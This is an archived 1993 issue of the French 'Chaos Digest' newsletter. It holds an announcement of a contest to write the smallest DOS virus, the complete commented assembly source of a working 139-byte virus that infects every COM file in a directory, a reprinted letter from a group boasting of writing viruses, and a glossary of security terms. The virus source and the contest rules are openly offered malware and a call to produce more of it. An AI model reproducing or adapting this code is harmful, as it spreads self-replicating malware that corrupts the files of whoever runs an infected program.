home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / KAOS1_09.ZIP / KAOS1-09
Text File  |  1993-03-31  |  29KB  |  749 lines

  1. Chaos Digest            Mercredi 17 Fevrier 1993        Volume 1 : Numero 9
  2.  
  3.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  4.        Archiviste: Yves-Marie Crabbe
  5.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  6.  
  7. TABLE DES MATIERES, #1.09 (17 Fev 1993)
  8. File 1--Annonce du 1er "International Computer Virus Writing Contest"
  9. File 2--Exemple d'ecriture d'un CPA sur 139 bytes
  10. File 3--Un Createur de CPA peut-il etre Patriotique?
  11. File 4--Glossaire de l'Insecurite Informatique
  12.  
  13. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  14. available at no cost from jbcondat@attmail.com. The editors may be
  15. contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at:
  16. Jean-Bernard Condat, Chaos Computer Club France [CCCF], 47 rue des Rosiers,
  17. 93400 St-Ouen, France
  18.  
  19. Issues of Chaos-D can also be found on some French BBS. Back issues of
  20. ChaosD can be found on the Internet as part of the Computer underground
  21. Digest archives.  They're accessible using anonymous FTP from:
  22.  
  23.         * ftp.eff.org (192.88.144.4) in /pub/cud
  24.         * red.css.itd.umich.edu (141.211.182.91) in /cud
  25.         * halcyon.com (192.135.191.2) in /pub/mirror/cud
  26.         * ftp.ee.mu.oz.au (128.250.77.2) in /pub/text/CuD
  27.         * nic.funet.fi (128.214.6.100) in /pub/doc/cud
  28.  
  29. CHAOS DIGEST is an open forum dedicated to sharing French information among
  30. computerists and to the presentation and debate of diverse views. ChaosD
  31. material may be reprinted for non-profit as long as the source is cited.
  32. Some authors do copyright their material, and they should be contacted for
  33. reprint permission.  Readers are encouraged to submit reasoned articles in
  34. French, English or German languages relating to computer culture and
  35. telecommunications.  Articles are preferred to short responses.  Please
  36. avoid quoting previous posts unless absolutely necessary.
  37.  
  38. DISCLAIMER: The views represented herein do not necessarily represent
  39.             the views of the moderators. Chaos Digest contributors
  40.             assume all responsibility for ensuring that articles
  41.             submitted do not violate copyright protections.
  42.  
  43. ----------------------------------------------------------------------
  44.  
  45. Date: Fri Feb 12 18:30:04 GMT 1993
  46. From: jbcondat@attmail.com (Chaos Computer Club France )
  47. Subject: File 1--Annonce du 1er "Intl. Computer Virus Writing Contest"
  48.  
  49.  
  50.                          W E L C O M E
  51.  
  52.                               T O
  53.  
  54.                              T H E
  55.  
  56.                            F I R S T
  57.  
  58.     * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  59.     *                                                     *
  60.     *              I N T E R N A T I O N A L              *
  61.     *                                                     *
  62.     *                   C O M P U T E R                   *
  63.     *                                                     *
  64.     *                      V I R U S                      *
  65.     *                                                     *
  66.     *                    W R I T I N G                    *
  67.     *                                                     *
  68.     *                    C O N T E S T                    *
  69.     *                                                     *
  70.     * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  71.  
  72.                          -  1 9 9 3 -
  73.  
  74.           Final Date For Submissions:  APRIL 1, 1993
  75.  
  76.  
  77.                  This Contest is Sponsored by:
  78.  
  79.                American Eagle Publications, Inc.
  80.                         P. O. Box 41401
  81.                       Tucson, AZ 85717 USA
  82.  
  83.      Publisher of The Little Black Book of Computer Viruses
  84.  
  85.     * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  86.     !  DISTRIBUTE THIS FILE ALL OVER THE KNOWN UNIVERSE   !
  87.     * * * * * * * * * * * * * * * * * * * * * * * * * * * *
  88.  
  89.         Ok, all you genius hackers out there! Here is a challenge
  90. for you. Prove your stuff!
  91.  
  92.         This is an INTERNATIONAL contest, and this file is
  93. being circulated all over the world, so if you want to compete,
  94. be forewarned, you've got worldwide competition. Only the best
  95. have a chance in this game.
  96.  
  97. Still up to the challenge?
  98.  
  99. Ok, here it is:
  100.  
  101. I am writing Volume 2 of The Little Black Book of Compter
  102. Viruses. This is a study of the scientific applications of
  103. computer viruses, and their use in artificial life research,
  104. and all of that neat stuff. One of the things I want to discuss
  105. in the book is the limit on the size of a virus for a given
  106. level of functionality. So I took the TIMID virus from Volume 1
  107. and tore it down to the bare minimum. Not good enough. I wrote
  108. a virus that worked a little differently. I tore that one down
  109. to the bare minimum. Good enough? Well maybe. But maybe not.
  110. I have some pretty compact code, but is it the absolute best?
  111. I'm guessing somebody out there can top it.
  112.  
  113. Here are the rules:
  114.  
  115. (1) The object of this game is to write the smallest
  116.     virus you can with the required level of functionality.
  117.  
  118. (2) The virus must be capable of infecting all COM files
  119.     on the logged drive in the current directory of a PC,
  120.     no matter how many COM files are there. It may infect
  121.     them as quickly or as slowly as you like, so long as
  122.     it can be demonstrated that it will do so in an hour,
  123.     when running the programs in that directory one after
  124.     the other in sequential order.
  125.  
  126. (3) The virus must recognize itself and avoid re-infecting
  127.     files that have been infected. At most, only one in
  128.     fifty thousand files should get accidently re-infected,
  129.     assuming that the data in unknown COM files is random.
  130.  
  131. (4) The virus must terminate gracefully if it cannot find a
  132.     file to infect.
  133.  
  134. (5) The virus must not destroy any of the code in any file
  135.     which it infects. It must allow that code to execute
  136.     properly, or refuse to infect a file.
  137.  
  138. (6) The virus must be self-contained. It cannot hide
  139.     code in some common location on disk.
  140.  
  141. (7) The virus must function properly under MS-DOS 5.0 with
  142.     no TSR's resident, and nothing loaded high.
  143.  
  144. (8) The size will be determined by the larger of (A) the
  145.     number of bytes the virus code itself takes up in
  146.     an infected file, and (B) the largest number of bytes
  147.     the virus adds to a program when it infects it.
  148.  
  149. The best code I have for a virus that follows these rules right
  150. now is 139 bytes long. Both source and executable are included
  151. in the ZIP, named LITTLE.ASM and LITTLE.COM.
  152.  
  153. In the event of a tie for size, originality and ingenuity of
  154. the code will break the tie. All judges decisions are final.
  155.  
  156. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  157.  
  158. The winner will receive the following:
  159.  
  160. (1) A $100 CASH REWARD.
  161.  
  162. (2) Your code will be published in "The Little Black Book
  163.     of Computer Viruses", Volume 2.
  164.  
  165. (3) I will give you credit for the code and for winning
  166.     the International Virus Contest in the book, using
  167.     either your real name or an alias, your choice,
  168.     published in the book.
  169.  
  170. (4) Your name will be posted on the MISS bulletin board
  171.     as the contest winner.
  172.  
  173. (5) A free copy of "The Little Black Book of Computer
  174.     Viruses", Volume 2, and a one year subscription to
  175.     Computer Virus Developments Quarterly ($95 value).
  176.  
  177. Three honorable mention winners will receive a free copy of
  178. The Little Black Book of Computer Viruses, Volume 2.
  179.  
  180. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  181.  
  182. You may make an entry in two ways:
  183.  
  184. (1) Mail your entry on a PC format floppy disk to American Eagle
  185. Publications, Inc., PO Box 41401, Tucson, AZ 85717 USA.
  186.  
  187. (2) Upload your entry to the M.I.S.S. bulletin board at
  188. (805)251-0564 in the USA. Log on as GUEST, password VIRUS,
  189. last 4 digits of phone number 0000, and upload to the CONTEST
  190. UPLOADS directory.
  191.  
  192. A valid entry consists of the following items:
  193.  
  194. (A) Complete source code for a virus, which can be assembled
  195. using either TASM, MASM, or A86. If you use another assembler
  196. and don't know if one of the above will work, then send the
  197. assembler along with the submission. If you do anything tricky
  198. that we may not understand, you must explain it in comments in
  199. the assembler source.
  200.  
  201. (B) A statement of who you are (aliases accepted) and how to
  202. get in touch with you in case you win the contest. This
  203. information will be kept strictly confidential, and encrypted
  204. at all times.
  205.  
  206. By submitting an entry to the contest, you agree that the
  207. copyright to your entry will be considered the property of
  208. American Eagle Publications. The copyright to any losing
  209. entry will be returned to the owner upon written request.
  210. In the event that you win or receive honorable mention in the
  211. contest, the copyright to the code will remain the property
  212. of American Eagle Publications, Inc.
  213.  
  214. You may submit your entry encrypted with PGP 2.1 if you
  215. desire. Use the following public key to encrypt:
  216.  
  217. -----BEGIN PGP PUBLIC KEY BLOCK-----
  218. Version: 2.1
  219.  
  220. mQBNAitZ9w4AAAECAOXJYOsJNavAAWFBRwf4/u0QWMJ9IHj8eajgOfDRdlCNwEBJ
  221. wMs1vb5GcdJCaeoCgBR3Xxzh6oEo2nrwfru8mqMABRG0CE1BTHVkd2ln
  222. =P6d4
  223. -----END PGP PUBLIC KEY BLOCK-----
  224.  
  225. Go to it!
  226.  
  227. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  228.  
  229.                D O N ' T   M I S S   O U T  ! ! !
  230.  
  231.                        Get Your Very Own
  232.  
  233.             International Virus Writing Contest 1993
  234.  
  235.                             T-SHIRT
  236.  
  237.  Great fun to wear to your local user's group meeting, or the
  238.  next computer security conference you attend. Sure to get
  239.  people's attention and initiate lots of interesting
  240.  conversation. Specify Small, Medium, or Large.
  241.  
  242.                            Only $9.95
  243.  
  244.                               from
  245.  
  246.                American Eagle Publications, Inc.
  247.                          P.O. Box 41401
  248.                         Tucson, AZ 85717
  249.  
  250.         (US Customers please add $3.00 for UPS delivery)
  251.    (Overseas customers please add $7.50 for airmail delivery)
  252.    (Overseas customers please add $3.00 for surface delivery)
  253.                  (AZ residents add 5% sales tax)
  254.  
  255. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  256.  
  257. American Eagle Publications, Inc., gives you first class
  258. information to learn the ins and outs of viruses. You may
  259. order any of the following items from American Eagle
  260. Publications, PO Box 41401, Tucson, AZ 85717. (Shipping is $2.00
  261. to the US, $7.50 for overseas airmail.) AZ residents add 5%
  262. sales tax.
  263.  
  264. The Little Black Book of Computer Viruses, Volume 1,
  265. by Mark Ludwig. This award-winning book will teach you the
  266. basics of how viruses work in no-nonsense terms. 192 pgs.,
  267. $14.95.
  268.  
  269. The Little Black Book of Computer Viruses Program Disk. All
  270. of the programs in the book, both source code and executables,
  271. $15.00.
  272.  
  273. Computer Virus Developments Quarterly, This takes up where the
  274. Little Black Book leaves off, providing the reader with
  275. quarterly updates on viruses and anti-virus  technology.
  276. For the advanced security specialist or programmer. One year
  277. subscription with diskettes, $75.00 postpaid, overseas airmail
  278. add $10.00.
  279.  
  280. Computer Virus Developments Quarterly, current single issue,
  281. $25.00. (Please inquire as to price and availability of back
  282. issues)
  283.  
  284. Technical Note #1: The Pakistani Brain Virus, a complete
  285. disassembly and explanation. This is one of the first boot
  286. sector viruses ever written, and the first stealth boot sector
  287. virus. It hides on floppy disks and inserts the label (c) Brain
  288. on the disk. 32 page booklet and diskette with assembler source
  289. and compiled virus, $20.00.
  290.  
  291. Technical Note #2: The Stoned Virus, a complete disassembly and
  292. explanation. The Stoned is the world's most successful boot
  293. sector virus. It infects floppy disks and hard disks. Find out
  294. what makes it tick. 24 page booklet and diskette with assembler
  295. source, compiled virus, and detection tool, $20.00.
  296.  
  297. Technical Note #3: The Jerusalem Virus, a complete disassembly
  298. and explanation. Jerusalem is an old but highly effective virus
  299. which hides in memory, and infects every program you try to
  300. execute. It starts deleting programs on Friday the 13th. Booklet
  301. and diskette with assembler source and compiled virus, $20.00.
  302.  
  303. Technical Note #4: How to Write Protect an MFM Hard Disk. The
  304. only hard-and-fast way to stop viruses from spreading is to
  305. physically write-protect your disk. This tech note tells you how
  306. to do it for the older MFM style drives. Some companies
  307. sell such devices for hundreds of dollars, but this booklet
  308. will tell you how to do the job for under $20. Complete with
  309. theory, circuit diagrams, and a circuit board layout. No
  310. diskette, $12.00.
  311.  
  312. How to Become a Virus Expert, a 60 minute audio tape by author
  313. Mark Ludwig tells you how to get hold of the critical information
  314. you need to protect your computers, and stop relying on some anti-
  315. virus product developer to spoon-feed you. $10.00.
  316.  
  317. Wanted: Translators for these works in all languages and outlets
  318. for these works in all countries. An opportunity for big $$ awaits
  319. the enterprising person. Please contact us.
  320.  
  321. +++++++
  322. No Virus Contest is complete without POLITICAL COMMENT:
  323.  
  324. Freedom is only free if it is VOLUNTARY. If you live in a
  325. "democratic" nation that will not allow secession, then you DO
  326. NOT live in a free country. The democracies of this world are
  327. learning how to become tyrannies. Support a Secession Ammendment
  328. for your constitution, before it is too late and you wish you
  329. had. Secession is the only logical way to short-circuit the trend
  330. toward big government and tyranny, short of all-out civil war.
  331. +++++++
  332.  
  333. ------------------------------
  334.  
  335. Date: Fri Feb 12 18:30:04 GMT 1993
  336. From: jbcondat@attmail.com (Chaos Computer Club France )
  337. Subject: File 2--Exemple d'ecriture d'un CPA sur 139 bytes
  338.  
  339.  
  340. ;A small (139 byte) virus with minimal required functionality.
  341.  
  342. ;This Virus for research purposes only. Please do not release!
  343. ;Please execute it only on a carefully controlled system, and only
  344. ;if you know what you're doing!
  345.  
  346. ;An example for
  347.  
  348.  
  349. ;#######################################################
  350. ;#    THE FIRST INTERNATIONAL VIRUS WRITING CONTEST    #
  351. ;#                        1 9 9 3                      #
  352. ;#                      sponsored by                   #
  353. ;#            American Eagle Publications, Inc.        #
  354. ;#######################################################
  355.  
  356.  
  357. ;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;"
  358. ;Link as "TLINK /T LITTLE;"
  359.  
  360. ;Basic explanation of how this virus works:
  361. ;
  362. ;The virus takes control when the program first starts up. All of its code
  363. ;is originally located at the start of a COM file that has been infected.
  364. ;When the virus starts, it takes over a segment 64K above the one where the
  365. ;program was loaded by DOS. It copies itself up there, and then searches
  366. ;for an uninfected file. To determine if a file is infected, it checks the
  367. ;first two bytes to see if they are the same as its first two bytes. It
  368. ;reads the file into memory right above where it is sitting (at 100H in the
  369. ;upper segment).  If not already infected, it just writes itself plus the
  370. ;file it infected back out to disk under the same file name. Then it moves
  371. ;the host in the lower segment back to offset 100H and executes it.
  372.  
  373.  
  374.    .model  tiny            ;Tiny model to create a COM file
  375.  
  376.    .code
  377.  
  378. ;DTA definitions
  379. DTA             EQU     0000H           ;Disk transfer area
  380. FSIZE           EQU     DTA+1AH         ;file size location in file search
  381. FNAME           EQU     DTA+1EH         ;file name location in file search
  382.  
  383.  
  384.    ORG     100H
  385.  
  386. ;*************************************************************************
  387. ;The virus starts here.
  388.  
  389. VIRSTART:
  390.    mov     ax,ds
  391.    add     ax,1000H
  392.    mov     es,ax               ;upper segment is this one + 1000H
  393.    mov     si,100H             ;put virus in the upper segment
  394.    mov     di,si               ;at offset 100H
  395.    mov     cl,BYTE (OFFSET HOST AND 0FFH)
  396.                                ;can't code this with TASM
  397.    mov     cl,8BH              ;we can assume ch=0
  398.    rep     movsb               ;this will louse the infection up if run
  399.                                ;under debug!
  400.    mov     ds,ax               ;set ds to high segment
  401.    push    ds
  402.    mov     ax,OFFSET FIND_FILE
  403.    push    ax
  404.    retf                        ;jump to high memory segment
  405.  
  406. ;Now it's time to find a viable file to infect. We will look for any COM
  407. ;file and see if the virus is there already.
  408. FIND_FILE:
  409.    xor     dx,dx               ;move dta to high segment
  410.    mov     ah,1AH              ;so we don't trash the command line
  411.    int     21H                 ;which the host is expecting
  412.    mov     dx,OFFSET COMFILE
  413.    mov     ch,3FH              ;search for any file, no matter what
  414.                                ;attribute (note: cx=0 before this instr)
  415.    mov     ah,4EH              ;DOS search first function
  416.    int     21H
  417. CHECK_FILE:
  418.    jc      ALLDONE             ;no COM files to infect
  419.  
  420.    mov     dx,FNAME            ;first open the file
  421.    mov     ax,3D02H ;r/w access open file, since we'll want to write to it
  422.                 int     21H
  423.    jc      NEXT_FILE           ;error opening file - quit and say this
  424.                                ;file can't be used
  425.    mov     bx,ax               ;put file handle in bx, and leave it there
  426.                                ;for the duration
  427.  
  428.    mov     di,FSIZE
  429.    mov     cx,[di]             ;get file size for reading into buffer
  430.    mov     dx,si               ;and read file in at HOST in new segment
  431.                                ;(note si=OFFSET HOST)
  432.    mov     ah,3FH              ;DOS read function
  433.    int     21H
  434.    mov     ax,[si]             ;si=OFFSET HOST here
  435.    jc      NEXT_FILE           ;skip file if error reading it
  436.  
  437.    cmp     ax,WORD PTR [VIRSTART]
  438. ;see if infected already
  439.    jnz     INFECT_FILE         ;nope, go do it
  440.  
  441.    mov     ah,3EH              ;else close the file
  442.    int     21H                 ;and fall through to search for another file
  443.  
  444. NEXT_FILE:
  445.    mov     ah,4FH              ;look for another file
  446.    int     21H
  447.    jmp     SHORT CHECK_FILE    ;and go check it out
  448.  
  449. COMFILE    DB      '*.COM',0
  450.  
  451. ;When we get here, we've opened a file successfully, and read it into
  452. ;memory.  In the high segment, the file is set up exactly as it will look
  453. ;when infected. Thus, to infect, we just rewrite the file from the start,
  454. ;using the ;image in the high segment.
  455. INFECT_FILE:
  456.    xor     cx,cx
  457.    mov     dx,cx               ;reset file pointer to start of file
  458.    mov     ax,4200H
  459.    int     21H
  460.  
  461.    mov     ah,40H
  462.    mov     dx,100H
  463.    mov     cx,WORD PTR [di]    ;adjust size of file for infection
  464.    add     cx,OFFSET HOST - 100H
  465.    int     21H                 ;write infected file
  466.  
  467.    mov     ah,3EH              ;close the file
  468.    int     21H
  469.  
  470. ;The infection process is now complete. This routine moves the host
  471. ;program down so that its code starts at offset 100H, and then transfers
  472. ;control to it.
  473. ALLDONE:
  474.    mov     ax,ss               ;set ds, es to low segment again
  475.    mov     ds,ax
  476.    mov     es,ax
  477.    push    ax                  ;prep for retf to host
  478.    shr     dx,1                ;restore dta to original value
  479.    mov     ah,1AH              ;for compatibility
  480.    int     21H
  481.    mov     di,100H             ;prep to move host back to original location
  482.    push    di
  483.    mov     cx,sp               ;move code, but don't trash the stack
  484.    sub     cx,si
  485.    mov     cx,0FE6FH           ;hand code the above to save a byte
  486.    rep     movsb               ;move code
  487.    retf                        ;and return to host
  488.  
  489. ;***************************************************************************
  490. ;The host program starts here. This one is a dummy that just returns control
  491. ;to DOS.
  492.  
  493. HOST:
  494.    mov     ax,4C00H            ;Terminate, error code = 0
  495.    int     21H
  496.  
  497. HOST_END:
  498.  
  499.    END     VIRSTART
  500.  
  501. ------------------------------
  502.  
  503. Date: 29 Jan 93 15:59:00 +0000
  504. From: ercm20@festival.edinburgh.ac.uk (Sam Wilson )
  505. Subject: File 3--Un Createur de CPA peut-il etre Patriotique?
  506. Repost: Virus-L Digest #6.16 (4 Fev 93)
  507.  
  508.  
  509. The following letter and editorial response appears in the February
  510. 1993 issue of the UK magazine 'Personal Computer World' under the
  511. heading "Spreading viruses":
  512.  
  513.       We are a bunch of programmers who, depressed with the lack of
  514.    viruses that have originated in England, have sought to change
  515.    matters.  We presently write viruses for the PC, Archimedes and Atari
  516.    ST.  We have increased the few viruses written in England by about
  517.    25, though this number is increasing all the time as our programmers
  518.    churn out more quality computer viruses.
  519.       Although there are many viruses about we hope to dominate the UK
  520.    'market'.  Won't it be nice, though, for England to have at least one
  521.    export?
  522.       Finally, we as an organisation like to stress that, contrary to
  523.    public opinion, we are *not* boring people who wear anoraks, nor are
  524.    we depraved people who were beaten as children and so grew up with a
  525.    hatred of humanity.
  526.       We are highly intelligent and good at programming and are just
  527.    ordinary people.  But we are gonna get you soon!
  528.  
  529.  
  530.                                                                    ARCV
  531.                                   (Association of Really Cruel Viruses)
  532. [And the editor replies:]
  533.  
  534.    You say you're not depraved people?  Perhaps you weren't beaten as
  535.    children, but as far as we're concerned you should be beaten as adults.
  536.  
  537.  
  538. I wish it were the April issue...
  539.  
  540. Sam Wilson
  541. Network Services Division
  542. Computing Services, The University of Edinburgh
  543. Edinburgh, Scotland, UK
  544.  
  545. ------------------------------
  546.  
  547. Date:    Fri, 12 Feb 93 23:26:52 +0000
  548. From:    tegra!vail@uunet.UU.NET (Johnathan Vail )
  549. Subject: File 4--Glossaire de l'Insecurite Informatique
  550. Repost from: Virus-L Digest #6.26 (16 Feb 1993)
  551.  
  552.  
  553. ________________________________________________________________________
  554.  
  555.  
  556.                 Glossary of Computer Insecurity
  557.  
  558.            Compiled by Johnathan Vail (vail@tegra.com)
  559.         Created by several people on comp.virus newsgroup
  560.  
  561. ________________________________________________________________________
  562.  
  563.  
  564. async interrupt (attack) - to exploit system vulnerabilities arising
  565.     from deficiencies in the interrupt management facilities of an
  566.     operating system.
  567.  
  568.  
  569. back door - This is an undocumented feature added to a product which
  570.     can allow those who know about it to gain access to features that are
  571.     otherwise protected.  The original Tempest video game was supposed to
  572.     have a key sequence that would allow the author of the firmware to get
  573.     free games in an arcade.  Some military systems are rumored to have
  574.     back doors in their software that prevents their being used against
  575.     the countries that built them.
  576.  
  577.  
  578. blivet (attack) - A denial-of-service attack performed by hogging
  579.     limited resources that have no access controls (for example, shared
  580.     spool space on a multi-user system). [Classically defined as "ten pounds
  581.     of horsesh*t in a five pound bag"]
  582.  
  583.  
  584. browsing - Gaining unauthorized read-only access to files.
  585.  
  586.  
  587. C2 Catch-22  - Refers to the paradox that all federal computers are
  588.     required to be certified to the C2 level of Trust (or better) by 1992
  589.     (especially if they are to be permitted access to a network), yet
  590.     because no C2 certification has ever been performed with the network
  591.     software active, NSA will revoke the certification of any system as
  592.     soon as it is connected to a network.  [Also "C2-by-'92 Catch-22".]
  593.  
  594.  
  595. cascading - To gain additional privileges on a host (or within a
  596.     process) by using those privileges legitimately (if perhaps unwisely)
  597.     granted to casual users.
  598.  
  599.  
  600. crayola books - A disparaging reference to the "rainbow books",
  601.     commonly used when referring to the upcoming rewrite of NSA's
  602.     technical computer security guidelines.
  603.  
  604.  
  605. crypt (attack) - Stealing the system password file and looking for
  606.     known encrypted passwords.
  607.  
  608.  
  609. data diddling - To alter another's data (especially, to do so subtly
  610.     so it will not be detected); a major breach of the hacker ethic.
  611.  
  612.  
  613. denial-of-service attack - Any method which an intruder might use to injure
  614.    authorized users of a system by making its facilities unavailable.  Often
  615.    easier to accomplish than hijacking a privileged account.
  616.  
  617.  
  618. dictionary (attack) - Trying a dictionary of commonly used or vendor
  619.     installed passwords.
  620.  
  621.  
  622. Easter Egg - This is a usually benign feature added to a product by
  623.     the programmer without official knowledge or consent.  One example of
  624.     the is the 'xyzzy' command in Data General's AOS operating system.
  625.     Another is the "RESIST THE DRAFT" message in an unused sector of Apple
  626.     Logo.
  627.  
  628.  
  629. ethical hacker - Someone who espouses the view that he/she may
  630.     "ethically" penetrate any computer or network so long as no data is
  631.     altered.  [Colloquially among computer security professionals: a dead
  632.     hacker (or one who has ceased hacking).]
  633.  
  634.  
  635. leapfrog (attack) - Using userid and password information obtained
  636.     illicitly from one host (e.g., downloading a file of account IDs and
  637.     passwords, tapping TELNET, etc.) to compromise another host.  Also, to
  638.     TELNET through one or more hosts in order to confuse a trace (standard
  639.     cracker procedure).
  640.  
  641.  
  642. masquerading - To assume the identity of another user to gain
  643.     unauthorized access to a host or network.
  644.  
  645.  
  646. mockingbird - Software that intercepts communications (especially
  647.     logon processes) between users and hosts and provides system-like
  648.     responses to the users while obtaining information (especially account
  649.     IDs and passwords).
  650.  
  651.  
  652. pest - A set of instructions that self-replicates uncontrollably,
  653.     eventually rendering a network or system unusable via a
  654.     blivet attack. [sometimes called "wabbits"]
  655.  
  656.  
  657. phage - An autonomous program that inserts malicious code into
  658.     other autonomous programs (e.g., a computer worm or probe
  659.     that carries a virus or trojan horse program).
  660.  
  661.  
  662. polymorphic virus - 1. A virus using variable encryption with a
  663.     variable decryption routine to avoid detection by its
  664.     "signature".  V2P6, Whale, Maltese, Amoeba, Russian Mutant
  665.     and PC-Flu 2 are examples. 2. Any virus that changes it's
  666.     behaviour such as infect different types of host or change
  667.     their mode of operation.  A virus that infects both .COM and
  668.     .EXE programs as well as boot sectors can be considered
  669.     polymorphic.
  670.  
  671.  
  672. probe - A non-self-replicating, autonomous program (or set of
  673.     programs) that has the ability to execute indirectly
  674.     through a network or multi-partition computer system
  675.     (e.g., various hacker utilities).
  676.  
  677.  
  678. rainbow books - NSA's technical computer security guidelines.
  679.     So named because each of the books is published with a
  680.     different color cover.  [See "crayola books".]
  681.  
  682.  
  683. scavenging - To exploit unerased residual data.  The controversy with
  684.     the Prodigy [users finding pieces of the their data in the
  685.     STAGE.DAT file] service is an alleged example of this.
  686.  
  687.  
  688. spoofing - An attack which relies on the inability of users or computer
  689.     systems to verify the identity or location of a communication partner.
  690.     A `mockingbird' spoofs the computer's login sequence to fool a user;
  691.     some cracking software repeatedly spoofs human login actions to fool
  692.     the computer.
  693.  
  694.  
  695. stealth virus - A type of virus that attempts to hide its existence.
  696.     A common way of doing this on IBM PCs is for the virus to hook
  697.     itself into the BIOS or DOS and trap sector reads and writes that
  698.     might reveal its existence.
  699.  
  700.  
  701. trapdoor - A method of bypassing a sequence of instructions, often
  702.     some part of the security code (e.g. the computer logon).
  703.  
  704.  
  705. time bomb - This is code or a program that checks the systems clock in
  706.     order to trigger its active symptoms.  The popular legend of the time
  707.     bomb is the programmer that installs one in his employer's computers
  708.     to go off in case he is laid off or fired.
  709.  
  710.  
  711. trojan (horse) - This is some (usually nasty) code that is added to,
  712.     or in place of, a harmless program.  This could include many viruses
  713.     but is usually reserved to describe code that does not replicate
  714.     itself.
  715.  
  716.  
  717. unknown system-state (attack) - To exploit the conditions that occur
  718.     after a partial or total system crash (e.g., some files remain open
  719.     without an end-of-file condition allowing an intruder to obtain
  720.     unauthorized access to other files by reading beyond the real EOF when
  721.     service is resumed).
  722.  
  723.  
  724. virus - a piece of code that is executed as part of another program
  725.     and can replicate itself in other programs.  The analogy to real
  726.     viruses is pertinent ("a core of nucleic acid, having the ability to
  727.     reproduce only inside a living cell").  Most viruses on PCs really are
  728.     viruses.
  729.  
  730.  
  731. worm - An autonomous program (or set of programs) that can replicate
  732.     itself, usually over a network.  A worm is a complete program by
  733.     itself unlike a virus which is either part of another program or
  734.     requires another program's thread of execution to operate.  Robert
  735.     Morris's program, the Internet Worm, is an example of a worm although
  736.     it has been mistakenly identified in the popular media as a virus.
  737.  
  738. ________________________________________________________________________
  739.  
  740.  _____
  741. |     | Johnathan Vail     vail@tegra.com     (508) 663-7435
  742. |Tegra| jv@n1dxg.ampr.org    N1DXG@448.625-(WorldNet)
  743.  -----  MEMBER: League for Programming Freedom (league@prep.ai.mit.edu)
  744.  
  745. ------------------------------
  746.  
  747. End of Chaos Digest #1.09
  748. ************************************
  749.